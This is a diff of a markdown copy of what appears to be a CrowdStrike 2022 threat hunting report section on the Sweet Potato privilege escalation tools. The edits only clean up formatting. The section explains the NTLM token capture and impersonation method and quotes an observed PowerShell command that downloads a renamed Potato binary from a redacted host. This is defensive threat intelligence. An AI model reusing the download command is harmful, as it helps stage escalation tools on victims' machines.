jacobdjwilson/awesome-annual-security-reports/Markdown Conversions/2022/Crowdstrike-Threat-Hunting-Report-2022.md

 Sweet Potato
 (and Other Potato Variations)
 Privilege Escalation
-In 2016, a privilege escalation vulnerability known as Hot Potato was discovered within the Windows operating system.
+In 2016, a privilege escalation vulnerability known as “Hot Potato” was discovered within the Windows operating system.
 The fundamental concept is to force a system to authenticate and capture the security token.
-Over time, variations of this technique were created with similar names such as Juicy Potato, Lonely Potato and Rogue Potato but relied on the same underlying method of capturing credentials in transit.
-More recently in 2020, a script called Sweet Potato was written to bundle multiple
+Over time, variations of this technique were created with similar names — such as “Juicy Potato,” “Lonely Potato” and “Rogue Potato” — but relied on the same underlying method of capturing credentials in transit.
+More recently in 2020, a script called “Sweet Potato” was written to bundle multiple
 Potato exploits, which can be run standalone or through attack frameworks such as PowerShell Empire and Cobalt Strike.
 Overview of method:
 1\.
-Forces NT AUTHORITYSYSTEM to authenticate via NTLM 1\.
-Captures authentication attempt to acquire security token 1\.
+Forces NT AUTHORITY/SYSTEM to authenticate via NTLM 2\.
+Captures authentication attempt to acquire security token 3\.
 Impersonates if the account will allow it (the account must have SeImpersonatePrivilege rights) In the Wild
 Despite variations of this tool dating back to 2016, it continues to find a place in adversary toolkits due to consistent innovation and ease of use.
-As with so many other exploitation tools, a push to one\-click solutions lowers the barrier to entry for adversaries and can make it easier for adversary groups to standardize procedures.
+As with so many other exploitation tools, a push to “one\-click” solutions lowers the barrier to entry for adversaries and can make it easier for adversary groups to standardize procedures.
 OverWatch Observations
 Sweet Potato is a collection of scripts that can be staged and downloaded from any adversary\-controlled domain or IP.
-OverWatch often sees the binary renamed as its downloaded to the victim host, and as a result, hash identification is useful for locating Potato binaries.
+OverWatch often sees the binary renamed as it’s downloaded to the victim host, and as a result, hash identification is useful for locating Potato binaries.
 Example of a renamed Potato binary: powershell Invoke\-WebRequest \-Uri
-"http:
-\[REDACTED]kumpir
+"http:/
+/\[REDACTED]/kumpir
 .exe" \-OutFile
 "c:
-userspublickumpir
+\\users\\public\\kumpir
 .exe"
 Trending Tools
 In many cases, it takes time for adversaries to adopt new techniques